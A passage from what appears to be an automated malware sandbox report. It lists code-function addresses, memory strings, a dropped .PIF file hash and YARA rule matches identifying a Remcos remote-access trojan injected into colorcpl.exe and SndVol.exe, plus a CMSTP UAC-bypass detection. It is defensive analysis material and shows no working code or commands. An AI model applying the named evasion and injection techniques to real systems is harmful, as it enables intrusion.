                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_030167EF
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F20C40_2_028F20C4
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299671B0_2_0299671B
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299E42F0_2_0299E42F
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029AE5FA0_2_029AE5FA
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299E9BE0_2_0299E9BE
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029CA93B0_2_029CA93B
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029C4FD90_2_029C4FD9
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029AAF670_2_029AAF67
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299F0670_2_0299F067
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029951830_2_02995183
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0299F1D00_2_0299F1D0
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029B56AC0_2_029B56AC
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029CB7690_2_029CB769
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029B547D0_2_029B547D
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0298B5950_2_0298B595
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029B5B380_2_029B5B38
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029B58DB0_2_029B58DB
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029BD8000_2_029BD800
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029AFD800_2_029AFD80
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FD62707_2_02FD6270
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FE33AB7_2_02FE33AB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FCE34B7_2_02FCE34B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC706A7_2_02FC706A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA40057_2_02FA4005
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC81E87_2_02FC81E8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FE41D97_2_02FE41D9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAF18B7_2_02FAF18B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FCE11C7_2_02FCE11C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC87F07_2_02FC87F0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FB742E7_2_02FB742E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FCE5A87_2_02FCE5A8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC75667_2_02FC7566
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FB7AD77_2_02FB7AD7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FDDA497_2_02FDDA49
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FADBF37_2_02FADBF3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC39D77_2_02FC39D7
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC797E7_2_02FC797E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FCDEED7_2_02FCDEED
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC5EEB7_2_02FC5EEB
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FB6E9F7_2_02FB6E9F
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FB7C407_2_02FB7C40
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC7DB37_2_02FC7DB3
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028B20C49_2_028B20C4
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 9_2_028BC95E9_2_028BC95E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028C627010_2_028C6270
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028D33AB10_2_028D33AB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028BE34B10_2_028BE34B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289400510_2_02894005
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B706A10_2_028B706A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289F18B10_2_0289F18B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028D41D910_2_028D41D9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B81E810_2_028B81E8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028BE11C10_2_028BE11C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B87F010_2_028B87F0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028A742E10_2_028A742E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028BE5A810_2_028BE5A8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B756610_2_028B7566
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028A7AD710_2_028A7AD7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028CDA4910_2_028CDA49
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289DBF310_2_0289DBF3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B39D710_2_028B39D7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B797E10_2_028B797E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028A6E9F10_2_028A6E9F
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B5EEB10_2_028B5EEB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028BDEED10_2_028BDEED
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028A7C4010_2_028A7C40
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B7DB310_2_028B7DB3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303E34B12_2_0303E34B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030533AB12_2_030533AB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0304627012_2_03046270
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303E11C12_2_0303E11C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301F18B12_2_0301F18B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030541D912_2_030541D9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030381E812_2_030381E8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301400512_2_03014005
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303706A12_2_0303706A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030387F012_2_030387F0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303756612_2_03037566
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303E5A812_2_0303E5A8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0302742E12_2_0302742E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301DBF312_2_0301DBF3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0304DA4912_2_0304DA49
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03027AD712_2_03027AD7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303797E12_2_0303797E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030339D712_2_030339D7
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03026E9F12_2_03026E9F
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03035EEB12_2_03035EEB
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303DEED12_2_0303DEED
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03037DB312_2_03037DB3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03027C4012_2_03027C40
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Qzzgbhha.PIF 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: String function: 0290894C appears 56 times
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: String function: 028F4500 appears 33 times
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: String function: 029089D0 appears 45 times
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: String function: 028F4860 appears 949 times
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: String function: 028F44DC appears 74 times
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: String function: 029AC400 appears 45 times
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: String function: 028F46D4 appears 244 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02FC4801 appears 41 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02F92093 appears 50 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02F91E65 appears 34 times
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02FC4E70 appears 54 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 028B4801 appears 41 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 02882093 appears 50 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 03001E65 appears 34 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 03034E70 appears 54 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 028B4E70 appears 54 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 02881E65 appears 34 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 03002093 appears 50 times
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 03034801 appears 41 times
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 028B46D4 appears 155 times
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 028B4860 appears 683 times
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 028C894C appears 50 times
                    Source: XjPA2pnUhC.exeBinary or memory string: OriginalFilename vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022F5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E674000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2130796963.000000007FB80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.0000000002853000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs XjPA2pnUhC.exe
                    Source: XjPA2pnUhC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
